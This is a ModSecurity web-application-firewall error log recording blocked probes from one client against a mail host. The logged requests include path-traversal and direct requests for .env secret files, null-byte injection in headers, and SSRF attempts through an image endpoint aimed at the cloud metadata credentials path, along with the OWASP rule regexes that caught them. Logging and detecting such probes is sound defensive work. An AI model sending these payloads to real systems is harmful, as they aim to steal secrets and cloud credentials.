[Tue May 12 05:30:02.460245 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.460309 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.460359 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.460727 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:02.463242 2026] [core:error] [pid 1825179:tid 1825205] [client 45.148.10.247:57606] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 05:30:02.472149 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.247:57638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKeuhs7kySIUZ3ORnIl-wAAAQg"]
[Tue May 12 05:30:02.472343 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.247:57638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKeuhs7kySIUZ3ORnIl-wAAAQg"]
[Tue May 12 05:30:03.595731 2026] [core:error] [pid 1844863:tid 1844893] [client 45.148.10.247:57646] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 05:30:03.852758 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.247:57358] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKet9r1yOh9TvizezifmQAAAEs"]
[Tue May 12 05:30:03.911159 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.247:57380] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKet81tk6y7yBJLpJo5pAAAAIM"]
[Tue May 12 05:30:04.705379 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.705448 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.705482 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.705699 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.705764 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.705811 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:04.706234 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:06.006790 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.247:62928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.staging"] [unique_id "agKevs1tk6y7yBJLpJo5swAAAJc"]
[Tue May 12 05:30:06.006958 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.247:62928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.staging"] [unique_id "agKevs1tk6y7yBJLpJo5swAAAJc"]
[Tue May 12 05:30:06.510028 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.247:62902] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.castiglionecf.com"] [uri "/_next/image/"] [unique_id "agKevvaAnTZtx1_H_wy3cwAAAVM"]
[Tue May 12 05:30:06.510761 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.247:62902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_next/image/"] [unique_id "agKevvaAnTZtx1_H_wy3cwAAAVM"]
[Tue May 12 05:30:06.731149 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.247:57462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuRfeipD4uoG21FowwQAAAAc"]
[Tue May 12 05:30:06.774587 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.247:57512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuRs7kySIUZ3ORnIl-QAAAQ8"]
[Tue May 12 05:30:06.838173 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.247:57546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeudr1yOh9TvizezifmwAAAFY"]
[Tue May 12 05:30:06.849933 2026] [security2:error] [pid 1842385:tid 1842397] [client 45.148.10.247:62952] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKevhs7kySIUZ3ORnIl_wAAAQc"]
[Tue May 12 05:30:06.850012 2026] [security2:error] [pid 1842385:tid 1842397] [client 45.148.10.247:62952] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKevhs7kySIUZ3ORnIl_wAAAQc"]
[Tue May 12 05:30:06.850139 2026] [security2:error] [pid 1842385:tid 1842397] [client 45.148.10.247:62952] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKevhs7kySIUZ3ORnIl_wAAAQc"]
[Tue May 12 05:30:07.493983 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.247:57500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuc1tk6y7yBJLpJo5qQAAAI0"]
[Tue May 12 05:30:07.544150 2026] [security2:error] [pid 1844863:tid 1844881] [client 45.148.10.247:57488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeufaAnTZtx1_H_wy3bQAAAUw"]
[Tue May 12 05:30:07.989989 2026] [security2:error] [pid 1808852:tid 1808878] [client 43.156.18.240:44178] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-brasserie/"] [unique_id "agKevxfeipD4uoG21FowyAAAABc"]
[Tue May 12 05:30:08.193216 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:08.193281 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:08.193316 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:08.193561 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:08.193602 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:08.194035 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:09.232322 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.247:57474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuRfeipD4uoG21FowwAAAAAY"]
[Tue May 12 05:30:09.373530 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.247:63002] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.castiglionecf.com"] [uri "/_next/image/"] [unique_id "agKewQgpmE1yW0glLdguPwAAANM"]
